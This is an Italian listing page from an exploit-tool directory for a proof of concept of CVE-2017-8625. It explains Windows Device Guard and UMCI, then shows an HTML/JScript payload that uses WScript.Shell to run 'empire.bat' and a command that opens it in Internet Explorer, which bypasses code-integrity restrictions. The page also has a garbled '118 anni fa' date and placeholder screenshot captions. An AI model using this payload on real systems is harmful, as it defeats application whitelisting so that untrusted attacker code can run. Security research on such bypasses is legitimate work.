Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-8625_Bypass_UMCI — Bypass della funzionalità UMCI in Internet Explorer | Kitploit
Strumenti/GitHubGitHub/homjxi0e/cve-2017-8625_bypass_umci
Escalation di PrivilegiAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration TestingSviluppo Payload
GitHubhomjxi0e/cve-2017-8625_bypass_umci

CVE-2017-8625_Bypass_UMCI

Bypass della funzionalità UMCI in Internet Explorer

Vedi Repository
118 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

cos'è ! Windows Defender Device Guard !


Windows Defender Device Guard è una combinazione di funzionalità di sicurezza hardware e software pensate per le imprese che, se configurate insieme, bloccano il dispositivo in modo che possa eseguire solo applicazioni attendibili che definisci nelle tue policy di integrità del codice. Se l'app non è attendibile non può essere eseguita, punto. Con hardware che soddisfa i requisiti di base, ciò significa anche che, anche se un attaccante riesce a ottenere il controllo del kernel di Windows, sarà molto meno probabile che possa eseguire codice eseguibile dannoso. Con hardware appropriato, Windows Defender Device Guard può utilizzare la nuova sicurezza basata sulla virtualizzazione in Windows 10 (disponibile nelle SKU desktop Enterprise ed Education e in tutte le SKU Server) per isolare il servizio di integrità del codice dal kernel Microsoft Windows stesso. In questo caso, il servizio di integrità del codice viene eseguito accanto al kernel in un contenitore protetto dall'hypervisor di Windows. Questa guida esplora le singole funzionalità di Windows Defender Device Guard e come pianificarle, configurarle e distribuirle. Include:

cos'è UMCI

UMCI impedisce l'esecuzione di binari non approvati, limita il Windows Scripting Host e pone PowerShell in modalità Constrained Language. Questo rende piuttosto difficile ottenere l'esecuzione di codice su un sistema. Questo post sta per

======================================================================||> bypass di UMCI in Internet Explorer con Jscript !

Facciamo una dimostrazione di bypass del codice

======================================================================||>

root@kitploit:~
<html>
  <body>
    <script type="text/jscript">
      var r = new ActiveXObject("WScript.Shell").Run("empire.bat");
    </script>
   </body>
</html>

======================================================================||>

root@kitploit:~
PS:>  C:\Users\Homjxie> cmd /C "C:\Program Files\Internet Explorer\iexplore.exe " "C:\Users\Homjxie\Desktop\Homjxie.html"

Modifica del codice Jscript !

screenshot del 2017-08-25 11-55-12 ======================================================================||>

Esegui il prossimo bypass

screenshot del 2017-08-25 11-56-01

======================================================================||> ======================================================================||>

Spiegazione dell'autore

@Matt Homjxi0e

Autore del bypass

@enigma0x3

Scarica lo strumento